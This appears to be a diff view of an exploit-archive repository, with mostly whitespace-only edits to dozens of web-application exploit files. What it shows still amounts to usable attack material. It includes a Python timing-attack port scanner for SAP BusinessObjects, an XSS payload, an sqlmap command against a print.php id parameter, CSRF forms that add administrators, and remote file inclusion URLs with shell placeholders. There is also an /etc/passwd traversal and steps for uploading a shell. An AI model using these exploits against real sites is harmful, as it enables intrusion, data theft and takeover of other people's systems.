3. Payload : <script> alert(1)</script>
4. Script saved and gives an image msg with a javascript execution on image click.
5. Therefore, Persistent XSS.

60
exploits/multiple/webapps/43404.py
View file

@ -19,8 +19,8 @@ import sys
if len(sys.argv) != 4:
   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
   sys.exit(1)
print "Usage: python sblpta.py http://path.faces targetIP targetPort"
sys.exit(1)
url = sys.argv[1]
targetIP = sys.argv[2]
@ -33,15 +33,15 @@ gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
try:
   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP Bussiness Object %s"  %url
request = urllib2.Request(url, headers=headers)
page = urllib2.urlopen(request, context=gcontext)
print "[*] Connected to SAP Bussiness Object %s" %url
except:
   print "[-] Failed To connect to SAP Bussiness Object %s" %url
   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
   sys.exit(2)
print "[-] Failed To connect to SAP Bussiness Object %s" %url
print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
sys.exit(2)
resheaders = page.info()
@ -50,50 +50,50 @@ content = page.readlines()
for line in content:
   if "com.sun.faces.VIEW" in line:
      sfview = line.split("=")[4].split("\"")[1]
      print "[*] Got java faces dynamic value"
if "com.sun.faces.VIEW" in line:
sfview = line.split("=")[4].split("\"")[1]
print "[*] Got java faces dynamic value"
   else:
      continue
else:
continue
if not sfview:
   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
   sys.exit(3)
print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
sys.exit(3)
formdata = {"_id0:logon:CMS":targetHostIP,
         "_id0:logon:USERNAME":"",
         "_id0:logon:PASSWORD":"",
         "com.sun.faces.VIEW":sfview,
         "_id0":"_id0"
         }
"_id0:logon:USERNAME":"",
"_id0:logon:PASSWORD":"",
"com.sun.faces.VIEW":sfview,
"_id0":"_id0"
}
data_encode = urllib.urlencode(formdata)
start =  datetime.now()
print "[*] Testing Timing Attack %s" %start       
start = datetime.now()
print "[*] Testing Timing Attack %s" %start
request = urllib2.Request(url,data_encode)
request.add_header('Cookie', cookie)
response  = urllib2.urlopen(request)
response = urllib2.urlopen(request)
end = datetime.now()
the_page = response.read()
if "FWM" in the_page:
   elapsedTime = end-start
   if elapsedTime.total_seconds() >= 10:
elapsedTime = end-start
if elapsedTime.total_seconds() >= 10:
      print "[*] Port %s is Open, Gotcha !!! " %targetPort
print "[*] Port %s is Open, Gotcha !!! " %targetPort
   else:
else:
      print "[*] Port %s is Closed , we die fast"  %targetPort
print "[*] Port %s is Closed , we die fast" %targetPort
elif "FWC" in the_page:
   print "[-] error login expired"
   sys.exit(10)
print "[-] error login expired"
sys.exit(10)

4
exploits/multiple/webapps/49372.txt
View file

@ -7,8 +7,8 @@
# Tested on: BackBox Linux
# CVE : CVE-2021-3018
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs

2
exploits/php/webapps/11127.txt
View file

@ -18,7 +18,7 @@
<input type="password" name="newpass2" size="40" maxlength="20" /></td>
<input type="radio" name="isadmin" value="1" onclick="Javascript:hesk_toggleLayerDisplay('options')" checked="checked" /> YES (access to all features and categories)</label><br />
<input type="radio" name="isadmin" value="0" onclick="Javascript:hesk_toggleLayerDisplay('options')" /> NO (you can limit features and categories)</label>
<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />  
<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />
<input type="checkbox" name="features[]" value="can_view_tickets" checked="checked" />View tickets<sup>1</sup></label><br />
<input type="checkbox" name="features[]" value="can_edit_tickets" />Edit ticket replies<sup>1</sup></label><br />
<input type="checkbox" name="features[]" value="can_del_notes" />Delete any ticket notes<sup>1, 2</sup></label><br />

4
exploits/php/webapps/1140.php
View file

@ -73,7 +73,7 @@ $datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
@ -86,7 +86,7 @@ $ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
{ echo "<td> </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)

4
exploits/php/webapps/11593.txt
View file

@ -11,11 +11,11 @@
#
# if(empty($admin_name))
# {
# $errorMessage=warning." Username is empty!";
# $errorMessage=warning." Username is empty!";
# }
# elseif(empty($admin_password))
# {
# $errorMessage=warning." Password is empty!";
# $errorMessage=warning." Password is empty!";
# }
#
#

8
exploits/php/webapps/11883.txt
View file

@ -18,7 +18,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
<title>WebSiteBaker 2.8.1 DataBase Backup</title>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
<p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
@ -26,7 +26,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
<a href="http://WwW.SeC-WaR.CoM<http://www.sec-war.com/>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
<p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>
<p align="center"> </p>
<p align="center"> </p>
<body bgcolor="#000000">
@ -39,9 +39,9 @@ Contact Me : Eg[At]Hack[DoT]Cl
<input type="submit" name="backup" value="Backup Database" />
</font></p>
</form>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
Shooter - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
<p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

20
exploits/php/webapps/12031.html
View file

@ -34,7 +34,7 @@ My home : Sec-war.com
</thead>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<p align="center"> </td>
<p align="center"> </td>
</tr>
<tbody id="tbody_bbtitle">
<tr vAlign="top">
@ -50,7 +50,7 @@ My home : Sec-war.com
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<div>
<p align="center"> </div>
<p align="center"> </div>
</td>
</tr>
<tbody id="tbody_bbtitle">
@ -59,13 +59,13 @@ My home : Sec-war.com
<p align="center">PASS must me*</td>
<td class="alt1" width="52%">
<p align="center">
<input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
<input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr">
</span></td>
</tr>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<div>
<p align="center"> </div>
<p align="center"> </div>
</td>
</tr>
<tbody id="tbody_bbtitle">
@ -76,12 +76,12 @@ My home : Sec-war.com
</td>
<td class="alt1" width="52%">
<p align="center">
<input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
<input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr">
</span></td>
</tr>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
 </td>
</td>
</tr>
<tbody id="tbody_bbtitle">
<tr vAlign="top">
@ -97,12 +97,12 @@ My home : Sec-war.com
<option>-- --</option>
<option value="MA"> </option>
<option value="EG" selected></option>
</select> <span lang="fr">  </span></td>
</select> <span lang="fr"> </span></td>
</tr>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<div>
<p align="center"> </div>
<p align="center"> </div>
</td>
</tr>
<tbody id="tbody_bbtitle">
@ -119,12 +119,12 @@ My home : Sec-war.com
<option value="3"></option>
<option value="2"></option>
<option value="1"></option>
</select> <span lang="fr">  </span></td>
</select> <span lang="fr"> </span></td>
</tr>
<tbody id="tbody_bbtitle">
<tr>
<td class="tfoot" align="middle" colSpan="2">
<input class="button" id="submit" type="submit" value="ok add "> 
<input class="button" id="submit" type="submit" value="ok add ">
</td>
</tr>
</table>

2
exploits/php/webapps/12045.html
View file

@ -50,7 +50,7 @@ size="2" face="Tahoma">
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</p>
</center>
</body>

2
exploits/php/webapps/12047.html
View file

@ -58,7 +58,7 @@ size="2" face="Tahoma">
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</p>
</center>
</body>

4
exploits/php/webapps/12049.html
View file

@ -39,7 +39,7 @@
or
</font>
<font face="Tahoma" size="2" color="#000000">http://victim</font><font
size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font
size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font
size="2" face="Tahoma">
<input type="text" name="victim" size="20";"></p>
<center>
@ -49,7 +49,7 @@ size="2" face="Tahoma">
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</p>
</center>
</body>

2
exploits/php/webapps/12322.txt
View file

@ -42,7 +42,7 @@
<tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
<tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
<tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
<tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
<tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
</table></form>
</html>

10
exploits/php/webapps/12496.html
View file

@ -13,8 +13,8 @@
<form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
<table width="70%" cellpadding="0" cellspacing="2" border="0">
<tr>
<td width="35%"> </td>
<td width="65%"> </td>
<td width="35%"> </td>
<td width="65%"> </td>
</tr>
<tr>
@ -40,15 +40,15 @@
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td></td>
<td height="30" style="padding-left:6px;">
<input name="Submit" type="submit" class="button" value="Submit">
 
<input name="Reset" type="reset" class="button" value="Reset">
</td>
</tr>

2
exploits/php/webapps/12563.txt
View file

@ -57,7 +57,7 @@ _____________________________________________________________
<input name="ok" type="submit" class="button" id="ok" value="OK">
</p>
<p align="center">(only gif png jpg are allowed) </p>
<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>
<p align="center">Files go to: http://example.pt/uploads/your_file.php.png</p>
</form>
</html>

2
exploits/php/webapps/12857.txt
View file

@ -84,7 +84,7 @@ Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&
FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>

4
exploits/php/webapps/1367.php
View file

@ -90,7 +90,7 @@ $datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
@ -103,7 +103,7 @@ $ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
{ echo "<td> </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)

44
exploits/php/webapps/13785.txt
View file

@ -1,23 +1,23 @@
        =======================================
          eLMS Pro SQLi and XSS Vulnerability
        =======================================
=======================================
eLMS Pro SQLi and XSS Vulnerability
=======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : eLMS Pro SQLi and XSS Vulnerability
@ -49,14 +49,14 @@ smart calendar. IM communication is available for all 3 user levels.
Xploit: SQLi Vulnerability
DEMO  URL :http://[site]/subscribe.php?course_id=[sqli]
DEMO URL :http://[site]/subscribe.php?course_id=[sqli]
###############################################################################################################
Xploit: XSS Vulnerability
  Attack Pattern: '"-->
Attack Pattern: '"-->
  http://[site]/subscribe.php?course_id=[XSS]
http://[site]/subscribe.php?course_id=[XSS]
###############################################################################################################

44
exploits/php/webapps/13786.txt
View file

@ -1,23 +1,23 @@
        =======================================
          PGAUTOPro SQLi and XSS Vulnerability
        =======================================
=======================================
PGAUTOPro SQLi and XSS Vulnerability
=======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : PGAUTOPro SQLi and XSS Vulnerability
@ -46,7 +46,7 @@ advertisirs, placing your own AdSense contextual ads will let you derive profit
Xploit: SQLi Vulnerability
DEMO  
DEMO
URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
@ -55,9 +55,9 @@ e%2Fbuy_do_search&page=[SQLi]
###############################################################################################################
Xploit: XSS Vulnerability
  Attack Pattern: '"-->
Attack Pattern: '"-->
  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
###############################################################################################################

18
exploits/php/webapps/13892.txt
View file

@ -1,12 +1,12 @@
Name : PHPAuctionSystem Upload Vulnerability
Date : june, 16 2010
Vendor url :http://www.phpauctions.info/
Critical Level     : HIGH
Critical Level : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
 
PHPAuctionSystem had various vulnerablities which was found
@ -15,17 +15,17 @@ PHPAuctionSystem had various vulnerablities which was found
Xploit:Upload Vulnerability
 Step 1: register as a user :)
 
 Step 2: goto "sell an item" option
Step 1: register as a user :)
 DEMO URL :http://[site]/select_category.php?
Step 2: goto "sell an item" option
 Step 3: post ur evil-code in the item description
DEMO URL :http://[site]/select_category.php?
 Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
Step 3: post ur evil-code in the item description
 demo url :http://[site]/sell.php :)
Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
demo url :http://[site]/sell.php :)
###############################################################################################################

6
exploits/php/webapps/13922.txt
View file

@ -1,6 +1,6 @@
Date : june, 18 2010
Vendor url :http://www.axxis.gr/
Critical Level     : HIGH
Critical Level : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
@ -32,8 +32,8 @@ Xploit:Persistent xss Vulnerability
Step 1 : As always register as a user :P
Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:"
 
         INsert your evil XSS script or xss shell ;) and voila
INsert your evil XSS script or xss shell ;) and voila
DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1

6
exploits/php/webapps/13938.html
View file

@ -39,7 +39,7 @@ HackTalk Security
</tr>
<tr style="display:none;">
<td> </td>
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
@ -80,7 +80,7 @@ Please note: You should only enter values in the above fields if you wish to cha
</tr>
<tr>
<td> </td>
<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
@ -90,7 +90,7 @@ Please note: You should only enter values in the above fields if you wish to cha
</tr>
<tr>
<td> </td>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />

2
exploits/php/webapps/13999.html
View file

@ -87,7 +87,7 @@ return(true);
<INPUT NAME=userfile SIZE=30 TYPE=file MaxFileSize="1000000">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
</TD></TR>
<TR><TD> </TD></TR>
<TR><TD> </TD></TR>
<TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the
file is completely transferred.<BR><BR></TD></TR>

4
exploits/php/webapps/14147.txt
View file

@ -16,8 +16,8 @@ admin panel for managing your forum. Also includes support for
categories, plugins, languages, and themes."
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
       - Mail: security[AT]adeo.com.tr
       - Web: http://security.adeo.com.tr
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerability:
If administrator of the board browse PoC attacker can gain privilege

2
exploits/php/webapps/14415.html
View file

@ -35,7 +35,7 @@ EZ-Oscommerce 3.1 Remote File Upload
FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt;

32
exploits/php/webapps/14439.txt
View file

@ -2,33 +2,33 @@
phpBazar admin information discloser Vulnerability
=====================================
Author                 :: Net_Spy
Group                  :: Aras cyber Army
Email                  :: tvc82_2002@yahoo.com
Discover               :: 1 july 2010
Critical Lvl           :: M
Published              :: 22 july 2010
Vendor                 :: http://www.smartisoft.com/
Author :: Net_Spy
Group :: Aras cyber Army
Email :: tvc82_2002@yahoo.com
Discover :: 1 july 2010
Critical Lvl :: M
Published :: 22 july 2010
Vendor :: http://www.smartisoft.com/
---------------------------------------------------------------------------
~~~~~~~~~
Dork                   :: intitle: phpBazar-AdminPanel
Dork :: intitle: phpBazar-AdminPanel
~~~~~~~~~~~~~~~~~~
demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
                         
demo :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
~~~~~~~~~~~~~~~~~~~~~~~~~
Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
             
              
Example Just For Edu :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
    All aras cyber amry members
   
DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
All aras cyber amry members
+++++++++++++++++++++++++++++++++++++++

4
exploits/php/webapps/14459.txt
View file

@ -33,8 +33,8 @@ Detail :
$title = $lang['saved_search'];
}
$display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe
($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> 
   <div class="note"><a href="index.php?action=delete_search&
($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a>
<div class="note"><a href="index.php?action=delete_search&
searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '"
onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />';

8
exploits/php/webapps/14639.txt
View file

@ -1,12 +1,12 @@
# Exploit Title: [MailForm Remote File Include ]
# Date: [14-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Author: LoSt.HaCkEr / aDaM_TRoJaN
# Software Link: [http://scripts.bdr130.net/files/any/MailForm.zip]
# Version: [v 1.2 ]
# Tested on: [Windows XP]
# CVE : [هكر المسيب]
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

8
exploits/php/webapps/14712.txt
View file

@ -1,12 +1,12 @@
# Exploit Title: [4images1.7.8 Remote File Include ]
# Date: [23-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Author: LoSt.HaCkEr / aDaM_TRoJaN
# Software Link: [http://www.4homepages.de/4images/download.php]
# Version: [v 1.7.8 ]
# Tested on: [Windows XP]
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

8
exploits/php/webapps/14799.txt
View file

@ -1,12 +1,12 @@
# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ]
# Date: [26-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Author: LoSt.HaCkEr / aDaM_TRoJaN
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Version: [v 3.0 ]
# Tested on: [Windows XP]
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

24
exploits/php/webapps/14819.html
View file

@ -8,24 +8,24 @@
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
<p
align="left"><font size="5"
color="#FFFFFF"><b>                                
color="#FFFFFF"><b>
               
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin
Exploit<br>
                                                                  
  
Author : RENO<br>
                                                         
    TeaM : SauDi ViRuS TeaM<br>
                                                           
  
TeaM : SauDi ViRuS TeaM<br>
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
                                                       
    
Email : R7e@HoTMaiL.coM</font></b></p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<svt>
<center>

2
exploits/php/webapps/14822.txt
View file

@ -1,6 +1,6 @@
# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ]
# Date: [28-8-2010]
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html]
# Version: [v 1.0 ]
# Tested on: [Windows XP]

4
exploits/php/webapps/14896.txt
View file

@ -1,6 +1,6 @@
# Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ]
# Date: [5-9-2010]
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
# Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/]
# Version: [v 3.0.1 ]
# Tested on: [Windows XP]
@ -9,4 +9,4 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~]
Greetings:  No
Greetings: No

6
exploits/php/webapps/14931.php
View file

@ -2,17 +2,17 @@
Date : Sep 6, 2010
Author: Saxtor {Location: South America (Guyana)}
Email: admin@saxtorinc.com
Category::  Web Applications 
Category:: Web Applications
Verison: 5.5
suffers a directory traversal
vulnerability.  This vulnerability could allow
vulnerability. This vulnerability could allow
attackers to read arbitrary files =>
------------------------------
http://localhost/Javabridge/source.php?source=/etc/passwd
------------------------------
 */
*/
<?php
/**

4
exploits/php/webapps/14965.txt
View file

@ -1,6 +1,6 @@
[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ]
[x] Date: 10-9-2010]
